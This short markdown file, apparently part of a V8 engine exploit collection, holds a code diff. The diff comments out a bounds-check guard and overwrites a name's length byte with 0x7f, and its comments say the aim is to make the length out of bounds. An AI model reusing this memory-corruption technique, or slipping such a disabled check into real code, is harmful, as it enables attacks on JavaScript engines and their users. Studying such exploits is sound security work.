allpaca/V8Harvest/V8Harvest_2017.md

     var subs = String.fromCharCode.apply(null, view.slice(i, i + name.length));
     if (subs != name) continue;
     ++count;
+    // One byte before this name, its length is encoded.

-    if (view.length >= 127) throw Error('cannot patch reliably');
+    // Patch this to 127, making it out of bounds. if (view.length >= 127) throw Error('cannot patch reliably');
     if (view[i - 1] != name.length) throw Error('unexpected length');
     view[i - 1] = 0x7f;